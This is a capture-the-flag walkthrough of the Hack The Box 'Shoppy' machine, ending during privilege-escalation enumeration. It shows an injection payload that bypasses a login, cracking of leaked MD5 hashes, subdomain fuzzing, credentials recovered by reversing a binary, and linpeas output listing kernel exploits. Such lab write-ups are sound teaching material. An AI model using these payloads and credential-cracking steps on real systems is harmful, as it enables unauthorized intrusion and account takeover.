HTB Shoppy Walkthrough

Explore how to hack a vulnerable admin portal.

HTB Shoppy Walkthrough
This image was generated using Microsoft Copilot.

A simple BOX to start or stay trained.

Let's start with the nmap scan.

Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-29 21:32 CEST
Nmap scan report for 10.10.11.180
Host is up (0.11s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 9e5e8351d99f89ea471a12eb81f922c0 (RSA)
|   256 5857eeeb0650037c8463d7a3415b1ad5 (ECDSA)
|_  256 3e9d0a4290443860b3b62ce9bd9a6754 (ED25519)
80/tcp open  http    nginx 1.23.1
|_http-server-header: nginx/1.23.1
|_http-title: Did not follow redirect to http://shoppy.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.80 seconds

Classic BOX with only the HTTPS port 80 on which to retrieve the information for the foothold and port 22 for the accesses of the users that we will find. Insert shoppy.htb into /etc/hosts and navigate the web.

A simple countdown shows how far away from a hypothetical date which in my case seems to be the next day. I investigated to anticipate the deadline of the countdown and see what would happen. However, I discovered that in reality, the deadline is 2030, and that the years are not shown on the counter. Moreover the code does not seem to do anything at the end, so it is perhaps a false trace.

$('#countdown').countdown({
	date: "2030/10/31",
	render: function(data) {
	  var el = $(this.el);
	  el.empty()
	    //.append("<div>" + this.leadingZeros(data.years, 4) + "<span>years</span></div>")
	    .append("<div>" + this.leadingZeros(data.days, 2) + " <span>days</span></div>")
	    .append("<div>" + this.leadingZeros(data.hours, 2) + " <span>hrs</span></div>")
	    .append("<div>" + this.leadingZeros(data.min, 2) + " <span>min</span></div>")
	    .append("<div>" + this.leadingZeros(data.sec, 2) + " <span>sec</span></div>");
	}
});

Since there are no navigable sections in the portal, I try a session with the dirb in search of hidden routes.

┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox/_10.10.11.180 - Shoppy (lin)]
└─$ dirb http://shoppy.htb    

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Oct 29 21:46:08 2022
URL_BASE: http://shoppy.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://shoppy.htb/ ----
+ http://shoppy.htb/admin (CODE:302|SIZE:28)                                                                                                                                                             
+ http://shoppy.htb/Admin (CODE:302|SIZE:28)                                                                                                                                                             
+ http://shoppy.htb/ADMIN (CODE:302|SIZE:28)                                                                                                                                                             
+ http://shoppy.htb/assets (CODE:301|SIZE:179)                                                                                                                                                           
+ http://shoppy.htb/css (CODE:301|SIZE:173)                                                                                                                                                              
+ http://shoppy.htb/exports (CODE:301|SIZE:181)                                                                                                                                                          
+ http://shoppy.htb/favicon.ico (CODE:200|SIZE:213054)                                                                                                                                                   
+ http://shoppy.htb/fonts (CODE:301|SIZE:177)                                                                                                                                                            
+ http://shoppy.htb/images (CODE:301|SIZE:179)                                                                                                                                                           
+ http://shoppy.htb/js (CODE:301|SIZE:171)                                                                                                                                                               
+ http://shoppy.htb/login (CODE:200|SIZE:1074)                                                                                                                                                           
+ http://shoppy.htb/Login (CODE:200|SIZE:1074)                                                                                                                                                           
                                                                                                                                                                                                         
-----------------
END_TIME: Sat Oct 29 21:55:37 2022
DOWNLOADED: 4612 - FOUND: 12

Some interesting routes come out. Obviously, the admin section cannot be reached until after logging in.

While the exports did not seem to accept methods in GET, it still doesn't fare any better with POST or PUT which I tried via postman.

Entering some value and trying to log in, I get a "Wrong Credential" message, then I try some SQLi (SQL injection) and as I insert a single quote in the username field, after a relatively long time I get a 503 error (Gateway Time-out). So I insist on this path in search of the correct payload, first with the classics.

' or '' = '

But every attempt ends in 503. Then I find a combination that finally gives me a "Wrong Credential" again, keeping the single quote

' || '' == '

Processing and proceeding on this path, I finally arrive at the suitable payload that grants me access to the portal.

' || 1==1 || ''== '

Perfect. With the exception of the order report, you can search for users through a simple form and download the result (using the exports routes found before).

Obviously, the first search I do is for "admin", which still gives me a good result.

[{"_id":"62db0e93d6d6a999a66ee67a","username":"admin","password":"23c6877d9e2b564ef8b32c3a23de27b2"}]

But, using the same injection used to access the portal, the list of users grows (slightly, but grows).

[{"_id":"62db0e93d6d6a999a66ee67a","username":"admin","password":"23c6877d9e2b564ef8b32c3a23de27b2"},{"_id":"62db0e93d6d6a999a66ee67b","username":"josh","password":"6ebcea65320589ca4f2f1ce039975995"}]

Let's try to understand what kind of encryption was used for the password, using one of the two.

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.180 - Shoppy (lin)/attack/hc]
└─$ echo 23c6877d9e2b564ef8b32c3a23de27b2 > pwd1.hash                                                                                                                                               255 ⨯
                                                                                                                                                                                                          
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.180 - Shoppy (lin)/attack/hc]
└─$ hashcat pwd1.hash  
hashcat (v6.2.6) starting in autodetect mode

/sys/class/hwmon/hwmon4/temp1_input: No such file or directory

OpenCL API (OpenCL 3.0 PoCL 3.0+debian  Linux, None+Asserts, RELOC, LLVM 13.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: pthread-Intel(R) Core(TM)2 Duo CPU     T8300  @ 2.40GHz, 1414/2892 MB (512 MB allocatable), 2MCU

The following 11 hash-modes match the structure of your input hash:

      # | Name                                                       | Category
  ======+============================================================+======================================
    900 | MD4                                                        | Raw Hash
      0 | MD5                                                        | Raw Hash
     70 | md5(utf16le($pass))                                        | Raw Hash
   2600 | md5(md5($pass))                                            | Raw Hash salted and/or iterated
   3500 | md5(md5(md5($pass)))                                       | Raw Hash salted and/or iterated
   4400 | md5(sha1($pass))                                           | Raw Hash salted and/or iterated
  20900 | md5(sha1($pass).md5($pass).sha1($pass))                    | Raw Hash salted and/or iterated
   4300 | md5(strtoupper(md5($pass)))                                | Raw Hash salted and/or iterated
   1000 | NTLM                                                       | Operating System
   9900 | Radmin2                                                    | Operating System
   8600 | Lotus Notes/Domino 5                                       | Enterprise Application Software (EAS)

Please specify the hash-mode with -m [hash-mode].

Started: Mon Oct 31 21:57:35 2022
Stopped: Mon Oct 31 21:57:50 2022

It seems that the biggest goes for the MD5; considering the simplicity of the machine, I would opt for the more classic one.

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.180 - Shoppy (lin)/attack/hc]
└─$ cat pwdonly.hash                                               
23c6877d9e2b564ef8b32c3a23de27b2
6ebcea65320589ca4f2f1ce039975995
                                                                                                                                                                                                          
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.180 - Shoppy (lin)/attack/hc]
└─$ hashcat -a 0 -m 0 pwdonly.hash /usr/share/wordlists/rockyou.txt 2&>/dev/null 
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.0+debian  Linux, None+Asserts, RELOC, LLVM 13.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: pthread-Intel(R) Core(TM)2 Duo CPU     T8300  @ 2.40GHz, 1414/2892 MB (512 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 2 digests; 2 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

6ebcea65320589ca4f2f1ce039975995:remembermethisway        
Cracking performance lower than expected?                 

* Append -O to the commandline.
  This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.           

                                                          
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 0 (MD5)
Hash.Target......: pwdonly.hash
Time.Started.....: Mon Oct 31 22:00:50 2022 (15 secs)
Time.Estimated...: Mon Oct 31 22:01:05 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   830.3 kH/s (0.13ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/2 (50.00%) Digests (total), 1/2 (50.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 87%

Started: Mon Oct 31 22:00:41 2022
Stopped: Mon Oct 31 22:01:07 2022

Perfect. It seems that josh is our user. I did not delay further and immediately tried to connect via ssh.

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.180 - Shoppy (lin)/attack/hc]
└─$ ssh [email protected]                                                                                                                                                                               1 ⨯
The authenticity of host 'shoppy.htb (10.10.11.180)' can't be established.
ED25519 key fingerprint is SHA256:RISsnnLs1eloK7XlOTr2TwStHh2R8hui07wd1iFyB+8.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'shoppy.htb' (ED25519) to the list of known hosts.
[email protected]'s password: 
Permission denied, please try again.
[email protected]'s password: 

At this point, I also tried the way of the subdomain of the main portal, but without success, I retraced my steps trying to decrypt the admin password that I had not been able to decrypt before, using different attack dictionaries, but still nothing. I used the same approach for portal subdomains (different dictionaries), but nothing there too. At this point, a message in the forum was crucial in which they suggested using "bitquark-subdomains-top100000.txt" as a dictionary (a relatively lucky choice for those who found it), which paid off.

https://github.com/danielmiessler/SecLists/raw/master/Discovery/DNS/bitquark-subdomains-top100000.txt

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.180 - Shoppy (lin)/attack/bf]
└─$ wfuzz -c -w ./bitquark-subdomains-top100000.txt -u http://shoppy.htb -H "Host:FUZZ.shoppy.htb" --hw 11 
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://shoppy.htb/
Total requests: 100000

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                  
=====================================================================

000047340:   200        0 L      141 W      3122 Ch     "mattermost"

After inserting the subdomain in my /etc/hosts file, I browsed the new portal.

Of course, josh's credentials work here.

I also find a lot of interesting messages on the various dashboards.

Including the framework (and the version) used for the development of the portal.

There are a number of vulnerabilities available for this platform, which I will keep in mind.

Mattermost : Products and vulnerabilities
Mattermost: List of all products, security vulnerabilities of products, cvss score reports, detailed graphical reports, vulnerabilities by years and metasploit modules related to products of this vendor.

But once again, I feel optimistic and tried the newly found credentials for the ssh connection.

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.180 - Shoppy (lin)/attack/bf]
└─$ ssh [email protected]     
[email protected]'s password: 
Linux shoppy 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Oct 31 15:14:04 2022 from 10.10.14.54
jaeger@shoppy:~$ ls -la
total 96
drwxr-xr-x 19 jaeger jaeger 4096 Jul 22 15:56 .
drwxr-xr-x  4 root   root   4096 Jul 22 13:12 ..
lrwxrwxrwx  1 jaeger jaeger    9 Jul 22 11:42 .bash_history -> /dev/null
-rw-r--r--  1 jaeger jaeger  220 Jul 22 11:39 .bash_logout
-rw-r--r--  1 jaeger jaeger 3723 Jul 22 12:05 .bashrc
drwx------ 14 jaeger jaeger 4096 Jul 22 12:55 .cache
drwx------ 12 jaeger jaeger 4096 Jul 22 13:47 .config
lrwxrwxrwx  1 jaeger jaeger    9 Jul 22 15:56 .dbshell -> /dev/null
drwxr-xr-x  2 jaeger jaeger 4096 Jul 22 11:40 Desktop
drwxr-xr-x  2 jaeger jaeger 4096 Jul 22 11:40 Documents
drwxr-xr-x  2 jaeger jaeger 4096 Jul 22 11:40 Downloads
drwx------  3 jaeger jaeger 4096 Jul 23 03:10 .gnupg
drwxr-xr-x  3 jaeger jaeger 4096 Jul 22 11:40 .local
-rw-------  1 jaeger jaeger    0 Jul 22 15:55 .mongorc.js
drwxr-xr-x  2 jaeger jaeger 4096 Jul 22 11:40 Music
drwxr-xr-x  4 jaeger jaeger 4096 Jul 22 12:06 .npm
drwxr-xr-x  5 jaeger jaeger 4096 Jul 22 12:06 .nvm
drwxr-xr-x  2 jaeger jaeger 4096 Jul 22 11:40 Pictures
drwxr-xr-x  5 jaeger jaeger 4096 Oct 31 13:10 .pm2
-rw-r--r--  1 jaeger jaeger  807 Jul 22 11:39 .profile
drwxr-xr-x  2 jaeger jaeger 4096 Jul 22 11:40 Public
drwxr-xr-x  7 jaeger jaeger 4096 Jul 23 03:42 ShoppyApp
-rwxr--r--  1 jaeger jaeger  130 Jul 22 12:25 shoppy_start.sh
drwx------  2 jaeger jaeger 4096 Jul 22 11:42 .ssh
drwxr-xr-x  2 jaeger jaeger 4096 Jul 22 11:40 Templates
-rw-r-----  1 root   jaeger   33 Oct 31 13:10 user.txt
drwxr-xr-x  2 jaeger jaeger 4096 Jul 22 11:40 Videos
jaeger@shoppy:~$ cat user.txt 
a******************************b

I took a look at the other users available, and there seems to be only one other user, just the one being talked about in the portal, and here is his password manager mentioned in the same post.

jaeger@shoppy:~$ ls -la ../
total 16
drwxr-xr-x  4 root   root   4096 Jul 22 13:12 .
drwxr-xr-x 19 root   root   4096 Sep 12 13:36 ..
drwxr-xr-x  3 deploy deploy 4096 Jul 23 03:34 deploy
drwxr-xr-x 19 jaeger jaeger 4096 Jul 22 15:56 jaeger
jaeger@shoppy:~$ ls -la ../deploy/
total 52
drwxr-xr-x 3 deploy deploy  4096 Jul 23 03:34 .
drwxr-xr-x 4 root   root    4096 Jul 22 13:12 ..
lrwxrwxrwx 1 deploy deploy     9 Jul 22 13:14 .bash_history -> /dev/null
-rw-r--r-- 1 deploy deploy   220 Mar 27  2022 .bash_logout
-rw-r--r-- 1 deploy deploy  3526 Mar 27  2022 .bashrc
-rw------- 1 deploy deploy    56 Jul 22 13:15 creds.txt
lrwxrwxrwx 1 deploy deploy     9 Jul 23 03:34 .dbshell -> /dev/null
drwx------ 3 deploy deploy  4096 Jul 23 03:31 .gnupg
-rwxr--r-- 1 deploy deploy 18440 Jul 22 13:20 password-manager
-rw------- 1 deploy deploy   739 Feb  1  2022 password-manager.cpp
-rw-r--r-- 1 deploy deploy   807 Mar 27  2022 .profile

Unfortunately, I did not have access to the source and credentials file located in the folder.

jaeger@shoppy:~$ cat ../deploy/creds.txt 
cat: ../deploy/creds.txt: Permission denied
jaeger@shoppy:~$ cat ../deploy/password-manager.cpp 
cat: ../deploy/password-manager.cpp: Permission denied

But apparently, I can run as deploy user the compiled source.

jaeger@shoppy:~$ sudo -l
[sudo] password for jaeger: 
Matching Defaults entries for jaeger on shoppy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jaeger may run the following commands on shoppy:
    (deploy) /home/deploy/password-manager

Pity you need a password (which are not the ones found so far).

jaeger@shoppy:~$ sudo -u deploy /home/deploy/password-manager
Welcome to Josh password manager!
Please enter your master password: Sh0ppyBest@pp!
Access denied! This incident will be reported !
jaeger@shoppy:~$ sudo -u deploy /home/deploy/password-manager
Welcome to Josh password manager!
Please enter your master password: remembermethisway
Access denied! This incident will be reported !

The time has come for a splendid session with IDA freeware; download the binary to your machine and analyze it. The code is relatively simple and the sending of messages on stdout and the request for the password on stdin are immediately visible.

Immediately afterwards a sequence of characters is visible, concatenated to form the string "Sample" (this, is probably, to avoid that the string is visible simply through the linux strings command, but it is only a guess), to then be compared with the input provided by the user.

The flow proceeds with the code block that reports the message of the result of the comparison. In the stream where the strings match, the "cat" command of the credentials file is also visible.

Let's not hesitate, and let's try the secret word on the password-manager.

jaeger@shoppy:~$ sudo -u deploy /home/deploy/password-manager
Welcome to Josh password manager!
Please enter your master password: Sample
Access granted! Here is creds !
Deploy Creds :
username: deploy
password: Deploying@pp!

Nice. We can now access via ssh with the "deploy" user.

┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox]
└─$ ssh [email protected]
[email protected]'s password: 
Linux shoppy 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
$ ls -la
total 52
drwxr-xr-x 3 deploy deploy  4096 Jul 23 03:34 .
drwxr-xr-x 4 root   root    4096 Jul 22 13:12 ..
lrwxrwxrwx 1 deploy deploy     9 Jul 22 13:14 .bash_history -> /dev/null
-rw-r--r-- 1 deploy deploy   220 Mar 27  2022 .bash_logout
-rw-r--r-- 1 deploy deploy  3526 Mar 27  2022 .bashrc
-rw------- 1 deploy deploy    56 Jul 22 13:15 creds.txt
lrwxrwxrwx 1 deploy deploy     9 Jul 23 03:34 .dbshell -> /dev/null
drwx------ 3 deploy deploy  4096 Jul 23 03:31 .gnupg
-rwxr--r-- 1 deploy deploy 18440 Jul 22 13:20 password-manager
-rw------- 1 deploy deploy   739 Feb  1  2022 password-manager.cpp
-rw-r--r-- 1 deploy deploy   807 Mar 27  2022 .profile

At first glance, I did not find anything interesting, but without wasting any more time, I immediately switched to a session with linpeas. First I download it on my machine and then make it available to the BOX via an improvised web server (the native php one will be fine).

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.180 - Shoppy (lin)/attack/upld]
└─$ wget https://github.com/carlospolop/PEASS-ng/releases/download/20221030/linpeas.sh                        
--2022-11-01 22:02:36--  https://github.com/carlospolop/PEASS-ng/releases/download/20221030/linpeas.sh
Resolving github.com (github.com)... 140.82.121.3
Connecting to github.com (github.com)|140.82.121.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/f90309fa-c675-4f4e-a8fd-777fbb693bba?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20221101%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20221101T210236Z&X-Amz-Expires=300&X-Amz-Signature=c5039d3a410c61570e710ad306df85b2c6e29fcb97847d6a3b7c2293616492fe&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream [following]
--2022-11-01 22:02:37--  https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/f90309fa-c675-4f4e-a8fd-777fbb693bba?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20221101%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20221101T210236Z&X-Amz-Expires=300&X-Amz-Signature=c5039d3a410c61570e710ad306df85b2c6e29fcb97847d6a3b7c2293616492fe&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.111.133, 185.199.110.133, 185.199.109.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 827827 (808K) [application/octet-stream]
Saving to: ‘linpeas.sh’

linpeas.sh                                         100%[==============================================================================================================>] 808.42K  1.10MB/s    in 0.7s    

2022-11-01 22:02:38 (1.10 MB/s) - ‘linpeas.sh’ saved [827827/827827]

                                                                                                                                                                                                          
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.180 - Shoppy (lin)/attack/upld]
└─$ ifconfig                                      
docker0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
[...]

tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1500
        inet 10.10.14.114  netmask 255.255.254.0  destination 10.10.14.114
        inet6 dead:beef:2::1070  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::dad9:d163:35d8:3fa9  prefixlen 64  scopeid 0x20<link>
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  txqueuelen 500  (UNSPEC)
        RX packets 259  bytes 37424 (36.5 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 389  bytes 34706 (33.8 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

[...]
                                                                                                                                                                                                          
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.180 - Shoppy (lin)/attack/upld]
└─$ php -S 10.10.14.114:5000                      
[Tue Nov  1 22:02:58 2022] PHP 8.1.7 Development Server (http://10.10.14.114:5000) started

linpeas output

[...]
╔══════════╣ CVEs Check
Potentially Vulnerable to CVE-2022-0847                                                                                                                                                                   

Potentially Vulnerable to CVE-2022-2588
[...]
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester                                                                                                                                                        
[+] [CVE-2021-3490] eBPF ALU32 bounds tracking for bitwise ops                                                                                                                                            

   Details: https://www.graplsecurity.com/post/kernel-pwning-with-ebpf-a-love-story
   Exposure: probable
   Tags: ubuntu=20.04{kernel:5.8.0-(25|26|27|28|29|30|31|32|33|34|35|36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52)-*},ubuntu=21.04{kernel:5.11.0-16-*}
   Download URL: https://codeload.github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490/zip/main
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2022-0847] DirtyPipe

   Details: https://dirtypipe.cm4all.com/
   Exposure: probable
   Tags: ubuntu=(20.04|21.04),[ debian=11 ]
   Download URL: https://haxx.in/files/dirtypipez.c

[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,[ debian=7|8|9|10|11 ],fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)

   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2022-2586] nft_object UAF

   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: less probable
   Tags: ubuntu=(20.04){kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2017-0358] ntfs-3g-modprobe

   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
   Exposure: less probable
   Tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2}
   Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41356.zip
   Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.
[...]
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports                                                                                                                             
tcp        0      0 127.0.0.1:8065          0.0.0.0:*               LISTEN      -                                                                                                                         
tcp        0      0 127.0.0.1:27017         0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::9093                 :::*                    LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 ::1:3000                :::*                    LISTEN      -                   
tcp6       0      0 ::1:5432                :::*                    LISTEN      -                   
[...]
╔══════════╣ Checking if containerd(ctr) is available
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation                                                                                                    
ctr was found in /usr/bin/ctr, you may be able to escalate privileges with it                                                                                                                             
ctr: failed to dial "/run/containerd/containerd.sock": connection error: desc = "transport: error while dialing: dial unix /run/containerd/containerd.sock: connect: permission denied"

╔══════════╣ Checking if runc is available
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/runc-privilege-escalation                                                                                                              
runc was found in /usr/bin/runc, you may be able to escalate privileges with it                                                                                                                           
[...]
                               ╔═══════════════════╗
═══════════════════════════════╣ Interesting Files ╠═══════════════════════════════                                                                                                                       
                               ╚═══════════════════╝                                                                                                                                                      
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                                                                          
strace Not Found                                                                                                                                                                                          
-rwsr-xr-- 1 root dip 395K Jan  6  2021 /usr/sbin/pppd  --->  Apple_Mac_OSX_10.4.8(05-2007)                                                                                                               
-rwsr-xr-x 1 root root 19K Jan 13  2022 /usr/libexec/polkit-agent-helper-1
-rwsr-xr-- 1 root messagebus 51K Feb 21  2021 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 471K Jul  1 17:37 /usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 15K Aug  5 03:00 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-x 1 root root 87K Feb  7  2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 63K Feb  7  2020 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 55K Jan 20  2022 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 58K Feb  7  2020 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 71K Jan 20  2022 /usr/bin/su
-rwsr-xr-x 1 root root 52K Feb  7  2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 179K Feb 27  2021 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 155K Jun  8 15:42 /usr/bin/ntfs-3g  --->  Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others(02-2017)
-rwsr-xr-x 1 root root 15K Aug 24 03:28 /usr/bin/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 35K Jan 20  2022 /usr/bin/umount  --->  BSD/Linux(08-1996)
